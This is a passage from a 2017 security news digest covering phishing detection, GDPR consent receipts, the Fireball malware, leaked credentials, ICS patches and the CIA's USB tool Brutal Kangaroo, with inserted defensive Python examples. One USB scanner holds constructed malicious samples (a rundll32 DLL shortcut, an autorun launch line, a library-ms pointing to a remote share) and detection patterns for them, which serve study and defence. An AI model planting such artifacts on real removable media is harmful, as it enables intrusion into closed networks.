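# Constructed baseline traffic (not real mailbox data): a CEO and CFO who write
# back and forth, plus a vendor that only ever sends invoices to the CFO.
CEO = "alice.chen@example-corp.com"
CFO = "bob.ortiz@example-corp.com"
VENDOR = "billing@vendor.example"
BASELINE = (
    [Msg(CEO, "Alice Chen", CFO, True)] * 40
    + [Msg(CFO, "Bob Ortiz", CEO, True)] * 25
    + [Msg(VENDOR, "Vendor Billing", CFO, True)] * 6
)

# Weights and threshold are assumptions chosen for this example.
WEIGHTS = {
    "first-contact": 2,          # this sender -> recipient edge has never been seen
    "display-name-mismatch": 3,  # a known display name arriving from an unknown address
    "auth-failed": 2,            # SPF/DKIM/DMARC did not pass
    "one-way-flow": 1,           # the recipient has never written back to this sender
}
ALERT_THRESHOLD = 3


def build_graph(msgs):
    """Edge counts between addresses plus a display-name -> addresses fingerprint."""
    edges = Counter()
    names = defaultdict(set)
    for m in msgs:
        edges[(m.sender.lower(), m.rcpt.lower())] += 1
        names[m.display.strip().lower()].add(m.sender.lower())
    return edges, names


def classify(msg, edges, names):
    """Score one inbound message against the graph; returns (score, reasons)."""
    s, r = msg.sender.lower(), msg.rcpt.lower()
    reasons = []
    if edges[(s, r)] == 0:
        reasons.append("first-contact")
    known = names.get(msg.display.strip().lower())
    if known and s not in known:
        reasons.append("display-name-mismatch")
    if not msg.auth_ok:
        reasons.append("auth-failed")
    if edges[(r, s)] == 0:
        reasons.append("one-way-flow")
    return sum(WEIGHTS[x] for x in reasons), reasons


def is_suspicious(msg, edges, names):
    return classify(msg, edges, names)[0] >= ALERT_THRESHOLD


if __name__ == "__main__":
    edges, names = build_graph(BASELINE)
    samples = [
        Msg(CEO, "Alice Chen", CFO, True),                            # normal traffic
        Msg("alice.chen@examp1e-corp.com", "Alice Chen", CFO, True),  # lookalike domain
        Msg(VENDOR, "Vendor Billing", CFO, False),                    # known sender, failed auth
    ]
    for m in samples:
        print(m.sender, classify(m, edges, names), is_suspicious(m, edges, names))
```

The lookalike-domain message passes authentication (the attacker controls that domain), so SPF/DKIM alone would not catch it; it is the mismatch between a familiar display name and a never-seen address, combined with the absence of any reply history, that pushes it over the threshold.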

It is this new application of machine-learning on big data to detect the anomalies in e-mail that could detect and prevent spear-phishing that has attracted the investors. "Advanced and targeted social engineering threats represent one of the most pernicious and dangerous challenges to organizations in both the public and private sector," explained Techstars Ventures Partner Ari Newman. "GreatHorn brings fresh thinking and a cloud-native, intelligent platform that can protect these organizations. We've been thrilled with the progress and execution GreatHorn has shown over the last few years and are excited to step up our investment in the company."

"GreatHorn," added .406 Ventures Partner Greg Dracon, "is at the forefront of next-generation cybersecurity, understanding that changing human behavior is difficult and that security awareness training is not nearly enough for employees faced with sophisticated phishing techniques that look real from presumably trusted contacts." Both Newman and Dracon are joining GreatHorn's board of directors.

Existing investors including ff Venture Capital, SoftTech Ventures and RRE Ventures also participated in the funding round.


Kantara Initiative Releases Consent Receipt Form for GDPR

23.6.2017 securityweek  Privacy
With less than one year before GDPR kicks in, the newswaves have been flooded in recent months with new surveys showing how ill-prepared business still remains. But while there is much news, there has been little in the way of practical technology solutions. The Kantara Initiative released one on Tuesday: a global consent receipt specification that meets GDPR requirements.

'Consent' is one of the big and far-reaching elements of GDPR. Failure to abide by the new consent requirements means failure to comply with GDPR, and potential liability for the regulation's stringent sanctions -- it is no longer simply a matter of preventing breaches.

Consent now must be informed and explicit. It means that in the event of a dispute over the use of personal information, or the transfer of personal data either between applications or to third parties, business will need to be able to prove that consent had indeed been given. Online tick-boxes and assumed consent will not suffice.

Kantara's Consent Receipt 1.0 (CR 1.0) (PDF) allows businesses dealing with EU-based companies to demonstrate they meet the notice requirements of GDPR scheduled to be enforced on May 25, 2018. The specification is available free for download. Its purpose is to decrease the reliance on privacy policies and enhance the ability for people to share and control personal information.

Related: GDPR Industry Roundup - One Year to Go

The Kantara Initiative is a non-profit alliance of companies involved with digital identities. It connects a global, open, and transparent community that includes CA Technologies, Experian, ForgeRock, Digi.me, Internet Society, Nomura Research Institute and SecureKey.

The consent receipt works both ways. While the business can prove that consent was genuinely given, the user can also define exactly what consent is withdrawn, either on its own or in conjunction with the so-called 'right to be forgotten'.

"Until CR 1.0," explains Colin Wallis, executive director at the Kantara Initiative, "there was no effective privacy standard or requirement for recording consent in a common format and providing people with a receipt they can reuse for data rights. Individuals could not track their consents or monitor how their information was processed or know who to hold accountable in the event of a breach of their privacy. CR 1.0 changes the game," he added. "A consent receipt promises to put the power back into the hands of the individual and, together with its supporting API -- the consent receipt generator -- is an innovative mechanism for businesses to comply with upcoming GDPR requirements. For the first time individuals and organizations will be able to maintain and manage permissions for personal data."

There is, however, the proverbial elephant in the room. The companies that will be most affected by GDPR and consent are the big tech companies like Google, Facebook and Microsoft. It is unknown at this stage whether Europe will have the political will to fully enforce GDPR against the big American giants. If these companies prevaricate over full compliance without redress from Europe, why should other companies worry about something as esoteric as a consent receipt?

SecurityWeek asked the Kantara developers if this was a concern. It is not. "Markets evolve, technologies emerge and people get tired of the same old same old," said one of the consent receipt developers. "Given the rising anger amongst the people that pay for ads on these platforms, and the increasing creepiness of surveillance capitalism, it's not an unreasonable bet to say that both Google and Facebook's days as kings of their hills are numbered. They won't diminish as quickly as Friendster but they will diminish. Both the tech and business press are typically ahistorical and short sighted, so it's not surprising that they are continually surprised by new developments."

His point is that GDPR reflects an almost worldwide shift in attitudes, with consumers becoming more aware of and cynical towards the use of their personal data within surveillance capitalism. "Despite cartel-like market domination in their areas, the actual switching costs for users (and customers) of Facebook and Google are very low."

However, by embracing the new reality of user-centric regulations, companies that rely on user information will better maintain and indeed increase their user numbers. The same basic principles apply to all businesses. Engaging and conforming with user-centric regulations will only strengthen the relationship between business and customers. Kantara's consent receipt form provides compliance with GDPR, and reassurance to customers.


Microsoft Downplays Impact of "Fireball" Malware

23.6.2017 securityweek  Virus
The Fireball malware detailed earlier this month might not have had as much impact as originally reported, Microsoft claims.

Operated by Chinese digital marketing agency Rafotech, the Fireball malware was designed to take over targeted browsers, spy on victims, and run code on compromised machines. Because of that, the threat can be used to download additional malware onto an infected machine, and also allows its operators to manipulate the victim’s Internet traffic to generate ad revenue.

The malware was discovered by security firm Check Point, which suggested at the time that over 250 million computers worldwide had been affected by the threat. Furthermore, the company also said that Fireball impacted 20% of all corporate networks out there.

According to Microsoft, however, the initial report on Fireball might have exaggerated the malware’s reach. The company also claims that it has been tracking Fireball since 2015, meaning that it isn’t as new as previously suggested.

“Our teams knew differently because we have been tracking this threat since 2015. While the threat is real, the reported magnitude of its reach might have been overblown,” Hamish O’Dea, Windows Defender Research, says.

The researcher reveals that the initial Fireball infection comes through software bundling, as the malware is installed alongside other programs users download via their browsers, often “apps or media of dubious origin (pirated apps, games, music or video, cracks or keygens, etc.).”

The Fireball suite also includes clean programs, and the malware abuses these apps as host processes to load malicious code and evade behavior-based detection. The suite’s components were designed to “either persist on an infected machine, monetize via advertising, or hijack browser search and home page settings,” O’Dea says.

Microsoft’s researcher confirms the malware was designed to hijack the browser’s home page and default search settings, thus loading a search page that earns malware creators revenue from users’ searches.

The tech giant reveals that the most prevalent malware families in the Fireball suite are SupTab, Xadupi, Ghokswa, and Sasquor.

According to Microsoft, Check Point erroneously estimated Fireball’s spread because it relied on the number of visits to the search pages (some visits came from clean machines) and on analyzing Alexa ranking data.

“The estimates were made from analyzing Alexa ranking data, which are estimates of visitor numbers based on a small percentage of Internet users. Alexa’s estimates are based on normal web browsing. They are not the kind of traffic produced by malware infections, like the Fireball threats, which only target Google Chrome and Mozilla Firefox. The Alexa traffic estimates for the Fireball domains, for example, differ from Alexa competitor SimilarWeb,” O’Dea points out.

Based on “intelligence gathered from 300 million Windows Defender AV clients since 2015, plus monthly scans by the MSRT on over 500 million machines since October 2016,” Microsoft determines that the scale of the Fireball threat over time was much lower than Check Point suggested.

Specifically, the company says the Malicious Software Removal Tool (MSRT) encountered SupTab 4,920,456 times, Xadupi 3,373,023 times, Ghokswa 1,503,968 times, and Sasquor 1,287,297 times.

Microsoft added the Fireball family of malware to its MSRT over the course of three releases in September 2016, October 2016, and February 2017. Thus, the number of machines that MSRT cleaned for the four most prevalent Fireball families suggests that only around 11 million computers were infected.

“We’ve reached out to Check Point and requested to take a closer look at their data,” O’Dea notes.

SecurityWeek has contacted Check Point for a comment but had not heard back at the time of publishing. We'll update the article as soon as a reply arrives.


UK politicians’ login credentials up for sale in the dark web
23.6.2017 securityaffairs Crime

According to The Times, Russian hackers are offering for sale on the dark web the login credentials of thousands of top UK politicians, officials, and diplomats.

Journalists at the British newspaper have found two huge lists of stolen credentials that were available for sale on Russian-speaking hacking sites. The huge trove of credentials included the log-in details of 1,000 British MPs and parliamentary staff, 7,000 police employees and over 1,000 Foreign Office officials.

“Passwords belonging to British cabinet ministers, ambassadors, and senior police officers have been traded online by Russian hackers, an investigation by The Times has found.” reads The Times. “Two huge lists of stolen data reveal private log-in details of 1,000 British MPs and parliamentary staff, 7,000 police employees and more than 1,000 Foreign Office officials, an analysis shows — including the department’s own head of IT.”


Experts who analyzed the lists speculate that they are composed of old credentials. The lists appear to be compiled from data coming from old data breaches such as LinkedIn and MySpace.

“They include passwords used by the former ambassador to Israel and the director-general of the Department for Exiting the European Union.” continues The Times.

The main risk is that victims used the same credentials to access other sensitive systems and networks.

It is interesting to note that despite official guidance advising the use of strong passwords, the data leak shows that many politicians were using easy to guess passwords.

“Peter Jones, the Foreign Office’s chief operating officer, who has overall responsibility for IT, appears to have used a highly insecure password which occurred more than 3,700 times in one of the lists.” continues the newspaper.

Many victims, such as the former Cabinet Office minister Brooks Newmark, re-used insecure passwords on multiple websites.
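Because the real exposure is reuse rather than the old accounts themselves, a defender who obtains such a list can check it against their own identity store. The following is an added example written for this page, not The Times's analysis or any tool it used; the dump contents, addresses and passwords are constructed. It counts how often each password appears (the check behind the "occurred more than 3,700 times" observation) and tests leaked plaintexts against salted PBKDF2 hashes, which is the form in which a directory would hold current passwords.

```python
import hashlib
import hmac
import os
from collections import Counter

# Constructed leaked list in the usual "email:password" dump format (not real data).
LEAKED_DUMP = """\
a.minister@example.gov.uk:Password1
b.official@example.gov.uk:Summer2016
c.staff@example.gov.uk:Password1
d.staff@example.gov.uk:correct-horse-battery-staple
e.officer@example.gov.uk:Password1
"""

# Constructed current passwords of the organisation's own users. In a real check
# only the salted hashes exist; they are derived here so the example runs offline.
CURRENT_PASSWORDS = [
    ("a.minister@example.gov.uk", "Password1"),                  # still using the leaked password
    ("b.official@example.gov.uk", "Tq9!vLw2#kRp"),               # changed since the breach
    ("d.staff@example.gov.uk", "correct-horse-battery-staple"),  # strong, but still reused
]
ITERATIONS = 50_000  # PBKDF2 work factor, kept low so the example runs quickly


def parse_dump(text):
    """Parse 'email:password' lines; passwords may themselves contain ':'."""
    creds = []
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        email, _, password = line.partition(":")
        creds.append((email.strip().lower(), password))
    return creds


def password_frequency(creds):
    """How often each password occurs in the dump."""
    return Counter(pw for _, pw in creds)


def common_password_accounts(creds, min_count):
    """Accounts whose password is shared by at least min_count entries in the dump."""
    freq = password_frequency(creds)
    return [email for email, pw in creds if freq[pw] >= min_count]


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_directory(entries):
    """Build {email: (salt, hash)} the way an identity store would hold it."""
    directory = {}
    for email, pw in entries:
        salt = os.urandom(16)
        directory[email] = (salt, hash_password(pw, salt))
    return directory


def find_reuse(creds, directory):
    """Users whose current internal password equals the leaked one for the same address."""
    reused = []
    for email, leaked_pw in creds:
        record = directory.get(email)
        if record is None:
            continue
        salt, stored = record
        if hmac.compare_digest(hash_password(leaked_pw, salt), stored):
            reused.append(email)
    return reused


if __name__ == "__main__":
    creds = parse_dump(LEAKED_DUMP)
    print("most common:", password_frequency(creds).most_common(1))
    print("shared passwords:", common_password_accounts(creds, min_count=3))
    print("reused internally:", find_reuse(creds, make_directory(CURRENT_PASSWORDS)))
```

Accounts returned by `find_reuse` are the ones to force a reset on; accounts returned by `common_password_accounts` used a password that is guessable regardless of whether it is still in use internally.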


Two British Men Arrested For Hacking Microsoft
23.6.2017 thehackernews  Crime
British police have arrested two men in the UK conspiring to hack into the computer networks of US tech giant Microsoft with plans to steal customers’ data from the software giant.
The suspects, a 22-year-old from Sleaford and a 25-year-old from Bracknell, were arrested by detectives from Britain's South East Regional Organised Crime Unit (SEROCU) on Thursday morning (22 June 2017).
The UK authorities arrested them at their homes in Lincolnshire and Bracknell and seized a number of devices after searching the properties.
While it is still unclear what systems were targeted, SEROCU believes the suspects are part of a larger international group that broke into Microsoft's network between January 2017 and March 2017 to scoop up customer information.
"This group is spread around the world and therefore the investigation is being coordinated with our various partners," Rob Bryant, detective sergeant SEROCU's Cyber Crime Unit said while announcing the arrest. "We have made two arrests in the UK this morning and have seized a number of devices."
"We're still in the early stages of this investigation and will work with our partners to ensure that cyber criminals have no place to hide. It's too early to speculate on what information the group has accessed, however, after speaking with Microsoft we can confirm they didn't gain access to customer information."
Both suspects, whose identities have not yet been revealed by the police, are currently in custody and have been charged under Britain's Computer Misuse Act with conspiracy to gain "unauthorised access" to protected computers belonging to Microsoft.
In response to the arrests, Tom Burt, Microsoft VP and deputy general counsel of the Digital Crimes Unit released a statement to BBC, saying:
"Today's action by authorities in the UK represents an important step...Stronger internet security depends on the ability to identify and prosecute cybercriminals. This requires not only a strong technical capability but the willingness to acknowledge issues publicly and refer them to law enforcement."
"No company is immune from cybercrime. No customer data was accessed, and we're confident in the integrity of our software and systems. We have comprehensive measures in place to prevent, detect, and respond to attacks."
SEROCU officials said they are working with Europol, the NCA's National Cyber Crime Unit, the FBI, the East Midlands Special Operations Unit (EMSOU), and Microsoft's cyber team to investigate the intrusions and bring culprits to justice.


Siemens Patches Flaws in SIMATIC, XHQ Products

23.6.2017 securityweek Vulnerability
Siemens and ICS-CERT published advisories this week to alert users of improper authentication and privilege escalation vulnerabilities affecting some SIMATIC and XHQ products.

The SIMATIC communication processor (CP) of the Redundant Network Access (RNA) series, which is designed for connecting S7-400 CPUs to industrial ethernet, is affected by a critical vulnerability that allows a remote, unauthenticated attacker to perform administrative actions on a device.

The security hole, tracked as CVE-2017-6868, affects the SIMATIC CP 44x-1 RNA modules running versions prior to 1.4.1. The flaw can only be exploited if the attacker has network access to TCP port 102 and the processor’s configuration is stored on the corresponding CPU.
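Because the advisory ties exploitation to network access to TCP port 102, the practical defence while patching is to verify that only the engineering stations can reach the modules on that port, and to track which modules are still below 1.4.1. The following added example (written for this page; it is not Siemens or ICS-CERT code, and the addresses, subnet, firmware values and flow-log format are assumed) audits constructed flow records for exactly that condition:

```python
import ipaddress

S7_PORT = 102                # ISO-on-TCP port named in the advisory
FIXED_VERSION = (1, 4, 1)    # CP 44x-1 RNA firmware that closes CVE-2017-6868

# Constructed inventory: RNA modules with their firmware, and the engineering
# subnet that is the only legitimate source of port-102 traffic (assumed addresses).
CP_MODULES = {
    ipaddress.ip_address("10.20.1.10"): "1.3.2",
    ipaddress.ip_address("10.20.1.11"): "1.4.1",
}
ENGINEERING_NETS = [ipaddress.ip_network("10.20.5.0/24")]

# Constructed flow records in "timestamp src dst dport proto" form (not real traffic).
FLOW_LOG = """\
2017-06-23T08:01:02Z 10.20.5.15 10.20.1.10 102 tcp
2017-06-23T08:02:10Z 10.20.5.16 10.20.1.11 102 tcp
2017-06-23T08:05:44Z 10.30.7.200 10.20.1.10 102 tcp
2017-06-23T08:06:01Z 10.30.7.200 10.20.1.10 443 tcp
2017-06-23T08:07:30Z 192.0.2.44 10.20.1.11 102 tcp
2017-06-23T08:08:12Z 10.20.5.15 10.20.1.10 102 udp
"""


def version_tuple(version):
    return tuple(int(part) for part in version.split("."))


def is_vulnerable_version(version):
    """True for firmware prior to 1.4.1, per the advisory."""
    return version_tuple(version) < FIXED_VERSION


def parse_flows(text):
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip blank or malformed records
        ts, src, dst, dport, proto = parts
        yield {
            "ts": ts,
            "src": ipaddress.ip_address(src),
            "dst": ipaddress.ip_address(dst),
            "dport": int(dport),
            "proto": proto.lower(),
        }


def audit_s7_access(text, modules=CP_MODULES, allowed=ENGINEERING_NETS):
    """Port-102 TCP flows to a CP module from outside the allowed subnets."""
    findings = []
    for flow in parse_flows(text):
        if flow["proto"] != "tcp" or flow["dport"] != S7_PORT:
            continue
        if flow["dst"] not in modules:
            continue
        if any(flow["src"] in net for net in allowed):
            continue
        firmware = modules[flow["dst"]]
        findings.append({
            "ts": flow["ts"],
            "src": str(flow["src"]),
            "dst": str(flow["dst"]),
            "firmware": firmware,
            "exposed_unpatched": is_vulnerable_version(firmware),
        })
    return findings


if __name__ == "__main__":
    for finding in audit_s7_access(FLOW_LOG):
        print(finding)
```

A hit with `exposed_unpatched` set is the one to act on first: an unexpected source has reached port 102 on a module whose firmware is still below the fixed version.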

In a separate advisory, ICS-CERT and Siemens described a medium severity privilege escalation flaw (CVE-2017-6866) affecting the XHQ automation software, which helps organizations improve enterprise performance by providing and aggregating operational and business data.

The vulnerability affects XHQ 4 versions prior to 4.7.1.3 and XHQ 5 versions prior to 5.0.0.2, and it can be exploited by an authenticated attacker with low privileges to read data they should not be allowed to access.

In the past weeks, Siemens released security updates for several of its products, including SINUMERIK automation products, RUGGEDCOM appliances, and SIMATIC and SCALANCE industrial products.

The company also alerted customers last month that many of its medical devices had been exposed to attacks due to the use of the SMB1 protocol, which the WannaCry ransomware exploited in recent attacks. Siemens updated many of its advisories this month to inform users about the availability of patches.


WikiLeaks Details CIA's Air-Gapped Network Hacking Tool

23.6.2017 securityweek  BigBrothers
WikiLeaks published several documents on Thursday detailing a tool allegedly used by the U.S. Central Intelligence Agency (CIA) to hack air-gapped networks through USB drives.

Dubbed “Brutal Kangaroo,” it has been described by its developer as a tool suite designed for targeting closed networks. The infected systems will form a covert network, and the attacker will be able to obtain information and execute arbitrary files.

One component of Brutal Kangaroo is called “Shattered Assurance” and it’s designed to automatically spread the tool to USB drives connected to a device within the targeted organization that was infected remotely via the Internet. Shattered Assurance relies on a tool named “Drifting Deadline” to infect thumb drives.

Once the victim connects the infected drive to an air-gapped network and Brutal Kangaroo is deployed, a component named “Broken Promise” is used to evaluate the harvested data. The last component, dubbed “Shadow,” acts as the primary persistence mechanism and command and control (C&C) server on the closed network.

The documents published by WikiLeaks show that Drifting Deadline and Shattered Assurance replaced two previous tools named “EZCheese” and “Emotional Simian.”

Brutal Kangaroo

Brutal Kangaroo infects USB drives by exploiting Windows vulnerabilities that allow an attacker to execute arbitrary DLL files using specially crafted shortcut (LNK) files. At least some of the exploits do not require users to actually run the malicious files.

Earlier versions of EZCheese leveraged a Windows vulnerability (CVE-2015-0096) discovered and patched in 2015. The flaw is a newer variant of CVE-2010-2568, which the notorious Stuxnet worm used in attacks aimed at Iran’s nuclear program.

One exploit used in later versions, dubbed “Lachesis” and designed for Windows 7, relies on autorun.inf to execute the malicious file as soon as the thumb drive is plugged in. Another exploit, named “RiverJack” and designed for Windows 7, 8 and 8.1, leverages library-ms functionality.

Microsoft said the vulnerabilities used by these exploits have already been patched in supported versions of Windows, but it’s unclear when. The company this month patched a LNK remote code execution flaw (CVE-2017-8464) that has been actively exploited, but no information has been provided on these attacks.
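The three artifact types named above (an autorun.inf with a launch directive, a shortcut that points at a DLL or at rundll32/control.exe, and a library-ms that references a remote location) are all things a quarantine host can look for before a removable drive is released into a closed network. The following scanner is an added example written for this page; it is not code from the leaked documents or from any vendor, and the drive contents are constructed.

```python
import re
import xml.etree.ElementTree as ET

# Shell Link header: HeaderSize 0x4C followed by LinkCLSID 00021401-0000-0000-C000-000000000046
LNK_HEADER = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
# Strings a document-share shortcut has no reason to carry
LNK_SUSPECT = re.compile(r"[\w.\\-]+\.dll|rundll32\.exe|control\.exe", re.I)

# Constructed contents of a removable drive, path -> bytes (not from any real device).
DRIVE = {
    "autorun.inf": b"[autorun]\r\nopen=setup.exe\r\nicon=setup.exe\r\n",
    "report.docx": b"PK\x03\x04constructed-placeholder",
    "Photos.lnk": LNK_HEADER + b"\x00" * 60
                  + "rundll32.exe .\\photo_viewer.dll,Start".encode("utf-16-le"),
    "Notes.lnk": LNK_HEADER + b"\x00" * 60 + "C:\\Users\\x\\notes.txt".encode("utf-16-le"),
    "Shared.library-ms": (
        b'<?xml version="1.0" encoding="UTF-8"?>'
        b'<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">'
        b"<searchConnectorDescriptionList><searchConnectorDescription><simpleLocation>"
        b"<url>\\\\198.51.100.7\\share</url>"
        b"</simpleLocation></searchConnectorDescription></searchConnectorDescriptionList>"
        b"</libraryDescription>"
    ),
}


def check_autorun(data):
    """Report open= / shellexecute= directives, the lines that launch something."""
    findings = []
    for line in data.decode("latin-1").splitlines():
        key, _, value = line.strip().partition("=")
        if key.strip().lower() in ("open", "shellexecute") and value.strip():
            findings.append(f"autorun.inf launches '{value.strip()}'")
    return findings


def check_lnk(data):
    """Flag shortcuts that carry a DLL or rundll32/control.exe reference."""
    if not data.startswith(LNK_HEADER):
        return ["file with .lnk extension lacks the Shell Link header"]
    # Strings in LNK files are usually UTF-16LE; try both alignments plus raw bytes.
    views = [
        data.decode("latin-1"),
        data.decode("utf-16-le", errors="ignore"),
        data[1:].decode("utf-16-le", errors="ignore"),
    ]
    hits = {m.group(0).lower() for view in views for m in LNK_SUSPECT.finditer(view)}
    return [f"shortcut references {h}" for h in sorted(hits)]


def check_library(data):
    """Flag library definitions whose location is a UNC path or a URL."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["library-ms is not well-formed XML"]
    findings = []
    for element in root.iter():
        if element.tag.rsplit("}", 1)[-1] == "url" and element.text:
            url = element.text.strip()
            if url.startswith("\\\\") or url.lower().startswith(("http:", "https:", "ftp:")):
                findings.append(f"library points to remote location {url}")
    return findings


def scan(drive):
    """Return {path: [findings]} for every artifact worth a look."""
    report = {}
    for path, data in drive.items():
        name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if name == "autorun.inf":
            findings = check_autorun(data)
        elif name.endswith(".lnk"):
            findings = check_lnk(data)
        elif name.endswith(".library-ms"):
            findings = check_library(data)
        else:
            continue
        if findings:
            report[path] = findings
    return report


if __name__ == "__main__":
    for path, findings in scan(DRIVE).items():
        print(path, findings)
```

`Notes.lnk` is a legitimate shortcut and produces nothing, while `Photos.lnk` is reported for both its DLL reference and its rundll32 invocation. The scanner is a triage aid, not a verdict: a clean result only means none of the three named patterns were present.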

While the exploits may have been successful in some cases, the Brutal Kangaroo documents show that security products from Symantec, Avira, Avast, Bitdefender and Kaspersky did block at least some functionality and attack vectors.

WikiLeaks has been publishing CIA files, which are part of a leak dubbed “Vault 7,” nearly every week since March 23. The tools exposed by the whistleblower organization include ones designed for replacing legitimate files with malware, hacking Samsung smart TVs and routers, MitM tools, a framework used to make malware attribution and analysis more difficult, and a platform for creating custom malware installers.

Security firms have found links between the tools exposed by Wikileaks and the malware used by a cyber espionage group tracked as “Longhorn” and “The Lamberts.”


Peripherals: poorly protected devices in company security

23.6.2017 SecurityWorld Security
According to IDC, the volume of data in 2015 reached approximately 8.5 ZB. The total amount of data will reach 40 ZB in 2020. By then 25 billion connected devices will be in use (in 2015 it was 4.9 billion). With the growth in data volume and number of clients, more opportunities also arise for cyber criminals, who attack unprotected or insufficiently protected endpoints. In 2014 companies reported a 48% year-on-year increase in the number of cyber attacks on their networks, and this number keeps growing.

However, according to a recent Spiceworks study, only 18% of surveyed IT professionals said they consider printers a medium-high or high security risk. And a mere 16% of surveyed IT professionals also protect printers with security certificates!

"All important company documents pass through printers combined with scanners, including strategies, contracts, price lists and often personal identity documents too. Over more than 20 years of daily use they have become one of the riskiest devices from a cyber-security standpoint. They serve as a gateway into the secured corporate network or as a remotely controlled source of cyber attacks. Because of their minimal security they are an easy target for hackers," says cyber-security expert Martin Půlpán.

HP multifunction devices behave on the network essentially like a computer. They send, receive and store the data needed for printing. They therefore deserve the same thorough protection as the computers and servers on the same network.

Unsecured printing devices can be vulnerable in many ways. Over the network: print and imaging jobs can be intercepted in transit to or from the device. BIOS and firmware: firmware that is altered at start-up or at run time can expose the device and the network to attacks. Storage media: imaging and printing devices store sensitive data on internal hard drives, which can be accessed if left unprotected.

Data stored on the devices should be encrypted. Many older devices, however, have no encrypted storage installed or cannot use it. Hard drives and files need to be wiped regularly. Few do it, though.

Unsecured devices can be endangered in other ways too, for example via the control panel, by data interception, via the input and output trays, and so on.

HP therefore offers in its new multifunction enterprise printers a comprehensive set of security features intended to protect the device, data and documents and to create a multi-layered approach to security, which is essential in combating today's advanced attacks.

The security features include, for example, HP Sure Start for verifying the integrity of the BIOS code, intrusion detection, HP JetAdvantage Security Manager for print security management (it automatically evaluates and, where necessary, corrects the device's security settings in line with pre-defined company policy), identity verification, encryption, automatic attack monitoring, SIEM integration, and so on.
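The policy-driven evaluation described for the security manager above, evaluating each device against pre-defined rules and correcting what is a pure configuration change, can be sketched in a few dozen lines. This is an added example written for this page, not HP's JetAdvantage code; the policy keys, remediation texts, device names, settings and firmware numbers are all assumed. It also handles the older-device case the article raises: a setting the device cannot support at all is reported separately from one that is merely misconfigured.

```python
# Constructed policy: the value every setting must have on a compliant device.
POLICY = {
    "disk_encryption": True,
    "secure_boot": True,            # BIOS/firmware integrity checking at start-up
    "snmp_v1v2_enabled": False,     # SNMPv1/v2c have no authentication
    "telnet_enabled": False,
    "ftp_enabled": False,
    "admin_https_only": True,       # embedded web server reachable over TLS only
    "default_admin_password": False,
    "syslog_forwarding": True,      # device logs go to the SIEM
}
REMEDIATION = {
    "disk_encryption": "enable encrypted storage for spooled jobs",
    "secure_boot": "enable firmware integrity checking",
    "snmp_v1v2_enabled": "disable SNMPv1/v2c and keep SNMPv3 only",
    "telnet_enabled": "disable Telnet",
    "ftp_enabled": "disable the FTP print path",
    "admin_https_only": "force HTTPS for the administration interface",
    "default_admin_password": "set a unique administrator password",
    "syslog_forwarding": "configure log forwarding to the SIEM",
}
MIN_FIRMWARE = (2, 4, 0)  # assumed minimum acceptable firmware

# Constructed fleet (not real devices). The legacy unit has no disk_encryption
# setting at all, i.e. the feature is absent rather than switched off.
DEVICES = [
    {"name": "mfp-hq-01", "firmware": "2.5.1", "settings": {
        "disk_encryption": True, "secure_boot": True, "snmp_v1v2_enabled": True,
        "telnet_enabled": True, "ftp_enabled": False, "admin_https_only": True,
        "default_admin_password": False, "syslog_forwarding": True}},
    {"name": "mfp-legacy-07", "firmware": "1.9.3", "settings": {
        "secure_boot": False, "snmp_v1v2_enabled": False, "telnet_enabled": False,
        "ftp_enabled": False, "admin_https_only": True,
        "default_admin_password": True, "syslog_forwarding": False}},
]


def version_tuple(version):
    return tuple(int(part) for part in version.split("."))


def evaluate(device, policy=POLICY):
    """Return (setting, problem, remediation) triples for every policy violation."""
    findings = []
    for key, required in policy.items():
        actual = device["settings"].get(key)
        if actual is None:
            findings.append((key, "unsupported on this device", REMEDIATION[key]))
        elif actual != required:
            findings.append((key, f"is {actual!r}, must be {required!r}", REMEDIATION[key]))
    if version_tuple(device["firmware"]) < MIN_FIRMWARE:
        wanted = ".".join(map(str, MIN_FIRMWARE))
        findings.append(("firmware", f"{device['firmware']} is below {wanted}",
                         "apply the vendor firmware update"))
    return findings


def auto_remediate(device, policy=POLICY):
    """Corrected settings for everything that is a pure configuration change.

    Unsupported settings and firmware are left for a human: they need an
    update or a replacement device, not a configuration push.
    """
    fixed = dict(device["settings"])
    for key, required in policy.items():
        if key in fixed and fixed[key] != required:
            fixed[key] = required
    return fixed


def fleet_summary(devices):
    """Device name -> number of open findings, for the dashboard view."""
    return {d["name"]: len(evaluate(d)) for d in devices}


if __name__ == "__main__":
    for device in DEVICES:
        print(device["name"])
        for finding in evaluate(device):
            print("  ", finding)
        print("   after remediation:", evaluate({**device, "settings": auto_remediate(device)}))
```

After `auto_remediate`, the head-office device is fully compliant, whereas the legacy device still reports the missing encryption capability and the old firmware, which is the information needed to decide between a compensating control and replacement.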


Mobile devices and various types of attacks and risks

23.6.2017 SecurityWorld Mobile
Smartphones and tablets give us easy access to critical corporate information, systems and functions. They let us work faster, more accurately and often 24x7. Giving employees access from mobile phones has many advantages, but it also brings new risks.

Mobile devices themselves, the networks they connect to, and the applications that run on them can all be abused to steal sensitive data such as documents, contact information, calendar appointments, e-mail messages and so on. Attackers can abuse the microphone and camera on your phone to eavesdrop on your meetings. When a user logs into a corporate system containing sensitive data, they can capture all usernames and passwords. Insufficiently secured networks let attackers eavesdrop on, spoof or even modify transmitted data. Rogue applications can then give them unrestricted access to phones, your data and the network.

Accurate detection of all modern attacks and their fast and effective blocking are critically important for effective protection. Classic antivirus and other signature- and reputation-based tools can detect traditional known threats, but they cannot effectively uncover newly created malware or vulnerabilities in networks, operating systems and mobile applications.
What are the attackers' goals?

Attacks on mobile devices and communications are growing rapidly. Mobile attackers quickly adopt working attack types from the "classic" (computer/network) world, adapt them to the mobile environment, and often come up with entirely new types of threats. Their end goals may include, for example, eavesdropping on and spying on sensitive information (by taking control of the microphone or camera) or intercepting information transmitted over mobile networks. They also seek access to corporate systems through the user's mobile device. Last but not least, they are after data theft, or data destruction or encryption, which will become ever more frequent in future as attacks using so-called mobile ransomware grow.
How are mobile risks perceived today?

A large proportion of companies today are not confident that they can defend against mobile cyber attacks, yet the vast majority, around 94% of them, expect this type of threat to increase. The number of mobile threats has grown more than fivefold over the past three years. At the start of 2017, for example, there were already more than 2.5 million known variants of mobile malware.
What are the modern types of mobile attacks?

